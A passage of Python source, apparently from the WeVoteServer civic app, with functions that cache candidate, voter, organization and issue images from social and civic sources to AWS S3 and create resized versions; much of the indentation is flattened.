cached_twitter_profile_background_image_url_large = None
cached_twitter_profile_banner_url_https = None
cached_twitter_profile_banner_url_large = None
cached_facebook_profile_image_url_https = None
cached_facebook_background_image_url_https = None
cached_facebook_background_image_url_large = None
cached_maplight_image_url_https = None
cached_vote_smart_image_url_https = None
cached_ballotpedia_image_url_https = None
cached_linkedin_image_url_https = None
cached_wikipedia_image_url_https = None
cached_other_source_image_url_https = None
we_vote_hosted_profile_image_url_large = None
we_vote_hosted_profile_image_url_medium = None
we_vote_hosted_profile_image_url_tiny = None
    # Cache refreshed new images to AWS S3
cache_master_images_results = cache_master_images(
voter_id=voter_id,
voter_we_vote_id=voter_we_vote_id,
candidate_id=candidate_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_id=organization_id,
organization_we_vote_id=organization_we_vote_id,
twitter_id=twitter_id,
twitter_screen_name=twitter_screen_name,
twitter_profile_image_url_https=twitter_profile_image_url_https,
twitter_profile_background_image_url_https=twitter_profile_background_image_url_https,
twitter_profile_banner_url_https=twitter_profile_banner_url_https,
facebook_user_id=facebook_user_id,
facebook_profile_image_url_https=facebook_profile_image_url_https,
facebook_background_image_url_https=facebook_background_image_url_https,
facebook_background_image_offset_x=facebook_background_image_offset_x,
facebook_background_image_offset_y=facebook_background_image_offset_y,
image_source=image_source,
maplight_id=maplight_id,
maplight_image_url_https=maplight_image_url_https,
vote_smart_id=vote_smart_id,
vote_smart_image_url_https=vote_smart_image_url_https,
ballotpedia_profile_image_url=ballotpedia_profile_image_url,
linkedin_profile_image_url=linkedin_profile_image_url,
wikipedia_profile_image_url=wikipedia_profile_image_url,
other_source_image_url=other_source_image_url,
other_source=other_source)
    # If the master image was just cached (or was already cached), create all resized versions of it
if cache_master_images_results['cached_twitter_profile_image'] is True or \
cache_master_images_results['cached_twitter_profile_image'] == IMAGE_ALREADY_CACHED:
create_resized_image_results = create_resized_images(
voter_we_vote_id=voter_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
twitter_profile_image_url_https=twitter_profile_image_url_https)
cached_twitter_profile_image_url_https = create_resized_image_results['cached_master_image_url']
we_vote_hosted_profile_image_url_large = create_resized_image_results['cached_resized_image_url_large']
we_vote_hosted_profile_image_url_medium = create_resized_image_results['cached_resized_image_url_medium']
we_vote_hosted_profile_image_url_tiny = create_resized_image_results['cached_resized_image_url_tiny']
if cache_master_images_results['cached_twitter_background_image'] is True or \
cache_master_images_results['cached_twitter_background_image'] == IMAGE_ALREADY_CACHED:
create_resized_image_results = create_resized_images(
voter_we_vote_id=voter_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
twitter_profile_background_image_url_https=twitter_profile_background_image_url_https)
cached_twitter_profile_background_image_url_https = create_resized_image_results['cached_master_image_url']
cached_twitter_profile_background_image_url_large = \
create_resized_image_results['cached_resized_image_url_large']
if cache_master_images_results['cached_twitter_banner_image'] is True or \
cache_master_images_results['cached_twitter_banner_image'] == IMAGE_ALREADY_CACHED:
create_resized_image_results = create_resized_images(
voter_we_vote_id=voter_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
twitter_profile_banner_url_https=twitter_profile_banner_url_https)
cached_twitter_profile_banner_url_https = create_resized_image_results['cached_master_image_url']
cached_twitter_profile_banner_url_large = create_resized_image_results['cached_resized_image_url_large']
if cache_master_images_results['cached_facebook_profile_image'] is True or \
cache_master_images_results['cached_facebook_profile_image'] == IMAGE_ALREADY_CACHED:
create_resized_image_results = create_resized_images(
voter_we_vote_id=voter_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
facebook_profile_image_url_https=facebook_profile_image_url_https)
cached_facebook_profile_image_url_https = create_resized_image_results['cached_master_image_url']
we_vote_hosted_profile_image_url_large = create_resized_image_results['cached_resized_image_url_large']
we_vote_hosted_profile_image_url_medium = create_resized_image_results['cached_resized_image_url_medium']
we_vote_hosted_profile_image_url_tiny = create_resized_image_results['cached_resized_image_url_tiny']
if cache_master_images_results['cached_facebook_background_image'] is True or \
cache_master_images_results['cached_facebook_background_image'] == IMAGE_ALREADY_CACHED:
create_resized_image_results = create_resized_images(
voter_we_vote_id=voter_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
facebook_background_image_url_https=facebook_background_image_url_https)
cached_facebook_background_image_url_https = create_resized_image_results['cached_master_image_url']
cached_facebook_background_image_url_large = create_resized_image_results['cached_resized_image_url_large']
if cache_master_images_results['cached_maplight_image'] is True or \
cache_master_images_results['cached_maplight_image'] == IMAGE_ALREADY_CACHED:
create_resized_image_results = create_resized_images(
voter_we_vote_id=voter_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
maplight_image_url_https=maplight_image_url_https)
cached_maplight_image_url_https = create_resized_image_results['cached_master_image_url']
we_vote_hosted_profile_image_url_large = create_resized_image_results['cached_resized_image_url_large']
we_vote_hosted_profile_image_url_medium = create_resized_image_results['cached_resized_image_url_medium']
we_vote_hosted_profile_image_url_tiny = create_resized_image_results['cached_resized_image_url_tiny']
if cache_master_images_results['cached_vote_smart_image'] is True or \
cache_master_images_results['cached_vote_smart_image'] == IMAGE_ALREADY_CACHED:
create_resized_image_results = create_resized_images(
voter_we_vote_id=voter_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
vote_smart_image_url_https=vote_smart_image_url_https)
cached_vote_smart_image_url_https = create_resized_image_results['cached_master_image_url']
we_vote_hosted_profile_image_url_large = create_resized_image_results['cached_resized_image_url_large']
we_vote_hosted_profile_image_url_medium = create_resized_image_results['cached_resized_image_url_medium']
we_vote_hosted_profile_image_url_tiny = create_resized_image_results['cached_resized_image_url_tiny']
if cache_master_images_results['cached_ballotpedia_image'] is True or \
cache_master_images_results['cached_ballotpedia_image'] == IMAGE_ALREADY_CACHED:
create_resized_image_results = create_resized_images(
voter_we_vote_id=voter_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
ballotpedia_profile_image_url=ballotpedia_profile_image_url)
cached_ballotpedia_image_url_https = create_resized_image_results['cached_master_image_url']
we_vote_hosted_profile_image_url_large = create_resized_image_results['cached_resized_image_url_large']
we_vote_hosted_profile_image_url_medium = create_resized_image_results['cached_resized_image_url_medium']
we_vote_hosted_profile_image_url_tiny = create_resized_image_results['cached_resized_image_url_tiny']
if cache_master_images_results['cached_linkedin_image'] is True or \
cache_master_images_results['cached_linkedin_image'] == IMAGE_ALREADY_CACHED:
create_resized_image_results = create_resized_images(
voter_we_vote_id=voter_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
linkedin_profile_image_url=linkedin_profile_image_url)
cached_linkedin_image_url_https = create_resized_image_results['cached_master_image_url']
we_vote_hosted_profile_image_url_large = create_resized_image_results['cached_resized_image_url_large']
we_vote_hosted_profile_image_url_medium = create_resized_image_results['cached_resized_image_url_medium']
we_vote_hosted_profile_image_url_tiny = create_resized_image_results['cached_resized_image_url_tiny']
if cache_master_images_results['cached_wikipedia_image'] is True or \
cache_master_images_results['cached_wikipedia_image'] == IMAGE_ALREADY_CACHED:
create_resized_image_results = create_resized_images(
voter_we_vote_id=voter_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
wikipedia_profile_image_url=wikipedia_profile_image_url)
cached_wikipedia_image_url_https = create_resized_image_results['cached_master_image_url']
we_vote_hosted_profile_image_url_large = create_resized_image_results['cached_resized_image_url_large']
we_vote_hosted_profile_image_url_medium = create_resized_image_results['cached_resized_image_url_medium']
we_vote_hosted_profile_image_url_tiny = create_resized_image_results['cached_resized_image_url_tiny']
if cache_master_images_results['cached_other_source_image'] is True or \
cache_master_images_results['cached_other_source_image'] == IMAGE_ALREADY_CACHED:
create_resized_image_results = create_resized_images(
voter_we_vote_id=voter_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
other_source_image_url=other_source_image_url)
cached_other_source_image_url_https = create_resized_image_results['cached_master_image_url']
we_vote_hosted_profile_image_url_large = create_resized_image_results['cached_resized_image_url_large']
we_vote_hosted_profile_image_url_medium = create_resized_image_results['cached_resized_image_url_medium']
we_vote_hosted_profile_image_url_tiny = create_resized_image_results['cached_resized_image_url_tiny']
results = {
'cached_twitter_profile_image_url_https': cached_twitter_profile_image_url_https,
'cached_twitter_profile_background_image_url_https': cached_twitter_profile_background_image_url_https,
'cached_twitter_profile_background_image_url_large': cached_twitter_profile_background_image_url_large,
'cached_twitter_profile_banner_url_https': cached_twitter_profile_banner_url_https,
'cached_twitter_profile_banner_url_large': cached_twitter_profile_banner_url_large,
'cached_facebook_profile_image_url_https': cached_facebook_profile_image_url_https,
'cached_facebook_background_image_url_https': cached_facebook_background_image_url_https,
'cached_facebook_background_image_url_large': cached_facebook_background_image_url_large,
'cached_maplight_image_url_https': cached_maplight_image_url_https,
'cached_vote_smart_image_url_https': cached_vote_smart_image_url_https,
'cached_ballotpedia_image_url_https': cached_ballotpedia_image_url_https,
'cached_linkedin_image_url_https': cached_linkedin_image_url_https,
'cached_wikipedia_image_url_https': cached_wikipedia_image_url_https,
'cached_other_source_image_url_https': cached_other_source_image_url_https,
'we_vote_hosted_profile_image_url_large': we_vote_hosted_profile_image_url_large,
'we_vote_hosted_profile_image_url_medium': we_vote_hosted_profile_image_url_medium,
'we_vote_hosted_profile_image_url_tiny': we_vote_hosted_profile_image_url_tiny
}
return results
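# A minimal, illustrative sketch of calling cache_master_and_resized_image for a candidate's
# Twitter profile photo. The ids and the image URL below are hypothetical placeholders; the
# keys read from `results` match the dictionary returned above.
def example_cache_candidate_twitter_photo():
    results = cache_master_and_resized_image(
        candidate_id=123,                           # hypothetical internal id
        candidate_we_vote_id="wv01cand123",         # hypothetical We Vote id
        twitter_id=456789,                          # hypothetical Twitter user id
        twitter_screen_name="example_candidate",
        twitter_profile_image_url_https="https://pbs.example.com/profile_normal.jpg")
    # The resized URLs are what a caller would typically store on the candidate record.
    return (results['cached_twitter_profile_image_url_https'],
            results['we_vote_hosted_profile_image_url_large'],
            results['we_vote_hosted_profile_image_url_medium'],
            results['we_vote_hosted_profile_image_url_tiny'])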
def cache_master_images(
twitter_id=None,
twitter_screen_name=None,
twitter_profile_image_url_https=None,
twitter_profile_background_image_url_https=None,
twitter_profile_banner_url_https=None,
voter_id=None,
voter_we_vote_id=None,
candidate_id=None,
candidate_we_vote_id=None,
organization_id=None,
organization_we_vote_id=None,
        image_source=None,
        facebook_user_id=None,
facebook_profile_image_url_https=None,
facebook_background_image_url_https=None,
facebook_background_image_offset_x=None,
facebook_background_image_offset_y=None,
maplight_id=None,
vote_smart_id=None,
maplight_image_url_https=None,
vote_smart_image_url_https=None,
ballotpedia_profile_image_url=None,
linkedin_profile_image_url=None,
wikipedia_profile_image_url=None,
other_source_image_url=None,
other_source=None):
"""
    Collect all kinds of images (profile, background, banner, etc.) from URLs hosted outside of the We Vote
    network, and cache them locally for a voter, candidate, or organization
:param twitter_id:
:param twitter_screen_name:
:param twitter_profile_image_url_https:
:param twitter_profile_background_image_url_https:
:param twitter_profile_banner_url_https:
:param voter_id:
:param voter_we_vote_id:
:param candidate_id:
:param candidate_we_vote_id:
:param organization_id:
:param organization_we_vote_id:
:param image_source: 2017-12-12 Currently not used within WeVoteServer
:param facebook_user_id:
:param facebook_profile_image_url_https:
:param facebook_background_image_url_https:
:param facebook_background_image_offset_x:
:param facebook_background_image_offset_y:
:param maplight_id:
:param maplight_image_url_https:
:param vote_smart_id:
:param vote_smart_image_url_https:
:param ballotpedia_profile_image_url:
:param linkedin_profile_image_url:
:param wikipedia_profile_image_url:
:param other_source_image_url:
    :param other_source:
:return:
"""
cache_all_kind_of_images_results = {
'image_source': image_source,
'voter_id': voter_id,
'voter_we_vote_id': voter_we_vote_id,
'candidate_id': candidate_id,
'candidate_we_vote_id': candidate_we_vote_id,
'organization_id': organization_id,
'organization_we_vote_id': organization_we_vote_id,
'cached_twitter_profile_image': False,
'cached_twitter_background_image': False,
'cached_twitter_banner_image': False,
'cached_facebook_profile_image': False,
'cached_facebook_background_image': False,
'cached_maplight_image': False,
'cached_vote_smart_image': False,
'cached_ballotpedia_image': False,
'cached_linkedin_image': False,
'cached_wikipedia_image': False,
'cached_other_source_image': False,
}
google_civic_election_id = 0
we_vote_image_manager = WeVoteImageManager()
if not twitter_profile_image_url_https:
cache_all_kind_of_images_results['cached_twitter_profile_image'] = TWITTER_URL_NOT_FOUND
else:
twitter_profile_image_url_https = we_vote_image_manager.twitter_profile_image_url_https_original(
twitter_profile_image_url_https)
if not twitter_profile_background_image_url_https:
cache_all_kind_of_images_results['cached_twitter_background_image'] = TWITTER_URL_NOT_FOUND
if not twitter_profile_banner_url_https:
cache_all_kind_of_images_results['cached_twitter_banner_image'] = TWITTER_URL_NOT_FOUND
if not facebook_profile_image_url_https:
cache_all_kind_of_images_results['cached_facebook_profile_image'] = FACEBOOK_URL_NOT_FOUND
if not facebook_background_image_url_https:
cache_all_kind_of_images_results['cached_facebook_background_image'] = FACEBOOK_URL_NOT_FOUND
if not maplight_image_url_https:
cache_all_kind_of_images_results['cached_maplight_image'] = MAPLIGHT_URL_NOT_FOUND
if not vote_smart_image_url_https:
cache_all_kind_of_images_results['cached_vote_smart_image'] = VOTE_SMART_URL_NOT_FOUND
if not ballotpedia_profile_image_url:
cache_all_kind_of_images_results['cached_ballotpedia_image'] = BALLOTPEDIA_URL_NOT_FOUND
if not linkedin_profile_image_url:
cache_all_kind_of_images_results['cached_linkedin_image'] = LINKEDIN_URL_NOT_FOUND
if not wikipedia_profile_image_url:
cache_all_kind_of_images_results['cached_wikipedia_image'] = WIKIPEDIA_URL_NOT_FOUND
if not other_source_image_url:
cache_all_kind_of_images_results['cached_other_source_image'] = OTHER_SOURCE_URL_NOT_FOUND
if twitter_profile_image_url_https:
cache_all_kind_of_images_results['cached_twitter_profile_image'] = cache_image_if_not_cached(
google_civic_election_id=google_civic_election_id,
image_url_https=twitter_profile_image_url_https, voter_we_vote_id=voter_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id, organization_we_vote_id=organization_we_vote_id,
twitter_id=twitter_id, twitter_screen_name=twitter_screen_name, is_active_version=True,
kind_of_image_twitter_profile=True, kind_of_image_original=True)
if twitter_profile_background_image_url_https:
cache_all_kind_of_images_results['cached_twitter_background_image'] = cache_image_if_not_cached(
google_civic_election_id=google_civic_election_id,
image_url_https=twitter_profile_background_image_url_https,
voter_we_vote_id=voter_we_vote_id, candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id, twitter_id=twitter_id,
twitter_screen_name=twitter_screen_name, is_active_version=True,
kind_of_image_twitter_background=True, kind_of_image_original=True)
if twitter_profile_banner_url_https:
cache_all_kind_of_images_results['cached_twitter_banner_image'] = cache_image_if_not_cached(
google_civic_election_id=google_civic_election_id,
image_url_https=twitter_profile_banner_url_https,
voter_we_vote_id=voter_we_vote_id, candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id, twitter_id=twitter_id,
twitter_screen_name=twitter_screen_name, is_active_version=True,
kind_of_image_twitter_banner=True, kind_of_image_original=True)
if facebook_profile_image_url_https:
cache_all_kind_of_images_results['cached_facebook_profile_image'] = cache_image_if_not_cached(
google_civic_election_id=google_civic_election_id,
image_url_https=facebook_profile_image_url_https,
voter_we_vote_id=voter_we_vote_id, candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id, facebook_user_id=facebook_user_id,
is_active_version=True, kind_of_image_facebook_profile=True, kind_of_image_original=True)
if facebook_background_image_url_https:
cache_all_kind_of_images_results['cached_facebook_background_image'] = cache_image_if_not_cached(
google_civic_election_id=google_civic_election_id,
image_url_https=facebook_background_image_url_https,
voter_we_vote_id=voter_we_vote_id, candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id, facebook_user_id=facebook_user_id,
is_active_version=True, kind_of_image_facebook_background=True,
facebook_background_image_offset_x=facebook_background_image_offset_x,
facebook_background_image_offset_y=facebook_background_image_offset_y,
kind_of_image_original=True)
if maplight_image_url_https:
cache_all_kind_of_images_results['cached_maplight_image'] = cache_image_if_not_cached(
google_civic_election_id=google_civic_election_id,
image_url_https=maplight_image_url_https,
voter_we_vote_id=voter_we_vote_id, candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id, maplight_id=maplight_id,
is_active_version=True, kind_of_image_maplight=True, kind_of_image_original=True)
if vote_smart_image_url_https:
cache_all_kind_of_images_results['cached_vote_smart_image'] = cache_image_if_not_cached(
google_civic_election_id=google_civic_election_id,
image_url_https=vote_smart_image_url_https,
voter_we_vote_id=voter_we_vote_id, candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id, vote_smart_id=vote_smart_id,
is_active_version=True, kind_of_image_vote_smart=True, kind_of_image_original=True)
if ballotpedia_profile_image_url:
cache_all_kind_of_images_results['cached_ballotpedia_image'] = cache_image_if_not_cached(
google_civic_election_id=google_civic_election_id,
image_url_https=ballotpedia_profile_image_url,
voter_we_vote_id=voter_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
is_active_version=True,
kind_of_image_ballotpedia_profile=True,
kind_of_image_original=True)
if linkedin_profile_image_url:
cache_all_kind_of_images_results['cached_linkedin_image'] = cache_image_if_not_cached(
google_civic_election_id=google_civic_election_id,
image_url_https=linkedin_profile_image_url,
voter_we_vote_id=voter_we_vote_id, candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id, is_active_version=True,
kind_of_image_linkedin_profile=True, kind_of_image_original=True)
if wikipedia_profile_image_url:
cache_all_kind_of_images_results['cached_wikipedia_image'] = cache_image_if_not_cached(
google_civic_election_id=google_civic_election_id,
image_url_https=wikipedia_profile_image_url,
voter_we_vote_id=voter_we_vote_id, candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id, is_active_version=True,
kind_of_image_wikipedia_profile=True, kind_of_image_original=True)
if other_source_image_url:
cache_all_kind_of_images_results['cached_other_source_image'] = cache_image_if_not_cached(
google_civic_election_id=google_civic_election_id,
image_url_https=other_source_image_url,
voter_we_vote_id=voter_we_vote_id, candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id, is_active_version=True,
kind_of_image_other_source=True, kind_of_image_original=True, other_source=other_source)
return cache_all_kind_of_images_results
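# A minimal, illustrative sketch of how callers interpret the cache_master_images results above.
# Each 'cached_*' value is either True (freshly cached), IMAGE_ALREADY_CACHED, one of the
# *_URL_NOT_FOUND constants (no source URL supplied), or an error value from
# cache_image_if_not_cached, so "True or IMAGE_ALREADY_CACHED" is treated as success,
# exactly as cache_master_and_resized_image does.
def twitter_profile_image_was_cached(cache_master_images_results):
    cached_value = cache_master_images_results['cached_twitter_profile_image']
    return cached_value is True or cached_value == IMAGE_ALREADY_CACHED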
def cache_issue_image_master(google_civic_election_id, issue_image_file, issue_we_vote_id=None,
kind_of_image_issue=False, kind_of_image_original=False):
"""
Cache master issue image to AWS. This function is a more focused version of cache_image_locally (which deals with
all of the standard photos like Facebook, or Twitter).
:param google_civic_election_id:
:param issue_image_file:
:param issue_we_vote_id:
:param kind_of_image_issue:
:param kind_of_image_original:
:return:
"""
we_vote_parent_image_id = None
success = False
status = ''
is_active_version = True
we_vote_image_created = False
image_url_valid = False
image_stored_from_source = False
image_stored_to_aws = False
image_versions = []
we_vote_image_manager = WeVoteImageManager()
# create we_vote_image entry with issue_we_vote_id and google_civic_election_id and kind_of_image
create_we_vote_image_results = we_vote_image_manager.create_we_vote_image(
google_civic_election_id=google_civic_election_id,
issue_we_vote_id=issue_we_vote_id,
kind_of_image_issue=kind_of_image_issue,
kind_of_image_original=kind_of_image_original)
status += create_we_vote_image_results['status']
if not create_we_vote_image_results['we_vote_image_saved']:
error_results = {
'success': success,
'status': status,
'we_vote_image_created': we_vote_image_created,
'image_url_valid': image_url_valid,
'image_stored_from_source': image_stored_from_source,
'image_stored_to_aws': image_stored_to_aws,
'we_vote_image': None
}
return error_results
we_vote_image_created = True
we_vote_image = create_we_vote_image_results['we_vote_image']
# image file validation and get source image properties
analyze_source_images_results = analyze_image_file(issue_image_file)
if not analyze_source_images_results['image_url_valid']:
error_results = {
'success': success,
'status': status + " IMAGE_URL_NOT_VALID",
'we_vote_image_created': True,
'image_url_valid': False,
'image_stored_from_source': image_stored_from_source,
'image_stored_to_aws': image_stored_to_aws,
'we_vote_image': None
}
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
return error_results
image_url_valid = True
status += " IMAGE_URL_VALID"
image_width = analyze_source_images_results['image_width']
image_height = analyze_source_images_results['image_height']
image_format = analyze_source_images_results['image_format']
# Get today's cached images and their versions so that image version can be calculated
cached_todays_we_vote_image_list_results = we_vote_image_manager.retrieve_todays_cached_we_vote_image_list(
issue_we_vote_id=issue_we_vote_id,
kind_of_image_issue=kind_of_image_issue,
kind_of_image_original=kind_of_image_original)
for cached_we_vote_image in cached_todays_we_vote_image_list_results['we_vote_image_list']:
if cached_we_vote_image.same_day_image_version:
image_versions.append(cached_we_vote_image.same_day_image_version)
if image_versions:
same_day_image_version = max(image_versions) + 1
else:
same_day_image_version = 1
image_stored_from_source = True
date_image_saved = "{year}{:02d}{:02d}".format(we_vote_image.date_image_saved.month,
we_vote_image.date_image_saved.day,
year=we_vote_image.date_image_saved.year)
    # ex issue_image_master-20170210_1_48x48.png
we_vote_image_file_name = "{image_type}_{master_image}-{date_image_saved}_{counter}_" \
"{image_width}x{image_height}.{image_format}" \
"".format(image_type=ISSUE_IMAGE_NAME,
master_image=MASTER_IMAGE, date_image_saved=date_image_saved,
counter=str(same_day_image_version),
image_width=str(image_width),
image_height=str(image_height),
image_format=str(image_format))
we_vote_image_file_location = issue_we_vote_id + "/" + we_vote_image_file_name
image_stored_to_aws = we_vote_image_manager.store_image_file_to_aws(
issue_image_file, we_vote_image_file_location)
if not image_stored_to_aws:
error_results = {
'success': success,
'status': status + " IMAGE_NOT_STORED_TO_AWS",
'we_vote_image_created': we_vote_image_created,
'image_url_valid': image_url_valid,
'image_stored_from_source': image_stored_from_source,
'image_stored_to_aws': False,
'we_vote_image': None
}
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
return error_results
we_vote_image_url = "https://{bucket_name}.s3.amazonaws.com/{we_vote_image_file_location}" \
"".format(bucket_name=AWS_STORAGE_BUCKET_NAME,
we_vote_image_file_location=we_vote_image_file_location)
save_aws_info = we_vote_image_manager.save_we_vote_image_aws_info(we_vote_image, we_vote_image_url,
we_vote_image_file_location,
we_vote_parent_image_id, is_active_version)
status += " IMAGE_STORED_TO_AWS " + save_aws_info['status']
success = save_aws_info['success']
if not success:
error_results = {
'success': success,
'status': status,
'we_vote_image_created': we_vote_image_created,
'image_url_valid': image_url_valid,
'image_stored_from_source': image_stored_from_source,
'image_stored_to_aws': image_stored_to_aws,
'we_vote_image': None
}
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
return error_results
save_source_info_results = we_vote_image_manager.save_we_vote_image_issue_info(
we_vote_image, analyze_source_images_results['image_width'],
analyze_source_images_results['image_height'], we_vote_image.we_vote_image_url,
same_day_image_version, image_url_valid)
status += " " + save_source_info_results['status']
if not save_source_info_results['success']:
error_results = {
'success': success,
'status': status,
'we_vote_image_created': we_vote_image_created,
'image_url_valid': image_url_valid,
'image_stored_from_source': False,
'image_stored_to_aws': image_stored_to_aws,
'we_vote_image': None
}
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
return error_results
    # set is_active_version False for other master images for the same issue
set_active_version_false_results = we_vote_image_manager.set_active_version_false_for_other_images(
issue_we_vote_id=issue_we_vote_id,
image_url_https=we_vote_image.we_vote_image_url,
kind_of_image_issue=True)
results = {
'success': success,
'status': status,
'we_vote_image_created': we_vote_image_created,
'image_url_valid': image_url_valid,
'image_stored_from_source': image_stored_from_source,
'image_stored_to_aws': image_stored_to_aws,
'we_vote_image': we_vote_image
}
return results
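# A minimal, illustrative sketch of the file naming used by cache_issue_image_master above.
# With date_image_saved "20170210", same_day_image_version 1 and a 48x48 PNG, the master
# issue image lands at "<issue_we_vote_id>/issue_image_master-20170210_1_48x48.png".
# The issue_we_vote_id below is a hypothetical placeholder.
def example_issue_image_file_location():
    example_file_name = "{image_type}_{master_image}-{date_image_saved}_{counter}_" \
                        "{image_width}x{image_height}.{image_format}" \
                        "".format(image_type=ISSUE_IMAGE_NAME, master_image=MASTER_IMAGE,
                                  date_image_saved="20170210", counter="1",
                                  image_width="48", image_height="48", image_format="png")
    return "wv85issue99" + "/" + example_file_name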
def cache_organization_sharing_image(
python_image_library_image=None,
organization_we_vote_id=None,
kind_of_image_original=False,
kind_of_image_chosen_favicon=False,
kind_of_image_chosen_logo=False,
kind_of_image_chosen_social_share_master=False):
"""
Cache master "chosen" images to AWS. This function is a more focused version of cache_image_locally
(which deals with all of the standard profile photos like Facebook, or Twitter).
:param python_image_library_image:
:param organization_we_vote_id:
:param kind_of_image_original:
:param kind_of_image_chosen_favicon:
:param kind_of_image_chosen_logo:
:param kind_of_image_chosen_social_share_master:
:return:
"""
we_vote_parent_image_id = None
success = False
status = ''
is_active_version = True
we_vote_image_created = False
image_url_valid = False
image_stored_from_source = False
image_stored_to_aws = False
image_versions = []
we_vote_image_manager = WeVoteImageManager()
create_we_vote_image_results = we_vote_image_manager.create_we_vote_image(
organization_we_vote_id=organization_we_vote_id,
kind_of_image_chosen_favicon=kind_of_image_chosen_favicon,
kind_of_image_chosen_logo=kind_of_image_chosen_logo,
kind_of_image_chosen_social_share_master=kind_of_image_chosen_social_share_master,
kind_of_image_original=kind_of_image_original)
status += create_we_vote_image_results['status']
if not create_we_vote_image_results['we_vote_image_saved']:
error_results = {
'success': success,
'status': status,
'we_vote_image_created': we_vote_image_created,
'image_url_valid': image_url_valid,
'image_stored_from_source': image_stored_from_source,
'image_stored_to_aws': image_stored_to_aws,
'we_vote_image': None
}
return error_results
we_vote_image_created = True
we_vote_image = create_we_vote_image_results['we_vote_image']
# image file validation and get source image properties
analyze_source_images_results = analyze_image_in_memory(python_image_library_image)
if not analyze_source_images_results['image_url_valid']:
error_results = {
'success': success,
'status': status + " IMAGE_URL_NOT_VALID ",
'we_vote_image_created': True,
'image_url_valid': False,
'image_stored_from_source': image_stored_from_source,
'image_stored_to_aws': image_stored_to_aws,
'we_vote_image': None
}
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
return error_results
image_url_valid = True
status += " IMAGE_URL_VALID "
image_width = analyze_source_images_results['image_width']
image_height = analyze_source_images_results['image_height']
image_format = analyze_source_images_results['image_format']
# Get today's cached images and their versions so that image version can be calculated
cached_todays_we_vote_image_list_results = we_vote_image_manager.retrieve_todays_cached_we_vote_image_list(
organization_we_vote_id=organization_we_vote_id,
kind_of_image_chosen_favicon=kind_of_image_chosen_favicon,
kind_of_image_chosen_logo=kind_of_image_chosen_logo,
kind_of_image_chosen_social_share_master=kind_of_image_chosen_social_share_master,
kind_of_image_original=kind_of_image_original)
for cached_we_vote_image in cached_todays_we_vote_image_list_results['we_vote_image_list']:
if cached_we_vote_image.same_day_image_version:
image_versions.append(cached_we_vote_image.same_day_image_version)
if image_versions:
same_day_image_version = max(image_versions) + 1
else:
same_day_image_version = 1
image_stored_from_source = True
date_image_saved = "{year}{:02d}{:02d}".format(we_vote_image.date_image_saved.month,
we_vote_image.date_image_saved.day,
year=we_vote_image.date_image_saved.year)
if kind_of_image_chosen_favicon:
image_type = CHOSEN_FAVICON_NAME
elif kind_of_image_chosen_logo:
image_type = CHOSEN_LOGO_NAME
elif kind_of_image_chosen_social_share_master:
image_type = CHOSEN_SOCIAL_SHARE_IMAGE_NAME
else:
image_type = 'organization_sharing'
if kind_of_image_original:
master_image = MASTER_IMAGE
else:
master_image = 'calculated'
    # ex chosen_logo_master-20170210_1_48x48.png (image_type varies with the kind_of_image_* flag)
we_vote_image_file_name = "{image_type}_{master_image}-{date_image_saved}_{counter}_" \
"{image_width}x{image_height}.{image_format}" \
"".format(image_type=image_type,
master_image=master_image,
date_image_saved=date_image_saved,
counter=str(same_day_image_version),
image_width=str(image_width),
image_height=str(image_height),
image_format=str(image_format))
we_vote_image_file_location = organization_we_vote_id + "/" + we_vote_image_file_name
image_stored_locally = we_vote_image_manager.store_python_image_locally(
python_image_library_image, we_vote_image_file_name)
if not image_stored_locally:
error_results = {
'success': success,
'status': status + " IMAGE_NOT_STORED_LOCALLY ",
'we_vote_image_created': we_vote_image_created,
'image_url_valid': image_url_valid,
'image_stored_from_source': image_stored_from_source,
'image_stored_locally': False,
'image_stored_to_aws': image_stored_to_aws,
}
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
return error_results
image_stored_to_aws = we_vote_image_manager.store_image_to_aws(
we_vote_image_file_name, we_vote_image_file_location, image_format)
if not image_stored_to_aws:
error_results = {
'success': success,
'status': status + " IMAGE_NOT_STORED_TO_AWS ",
'we_vote_image_created': we_vote_image_created,
'image_url_valid': image_url_valid,
'image_stored_from_source': image_stored_from_source,
'image_stored_to_aws': False,
'we_vote_image': None
}
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
return error_results
we_vote_image_url = "https://{bucket_name}.s3.amazonaws.com/{we_vote_image_file_location}" \
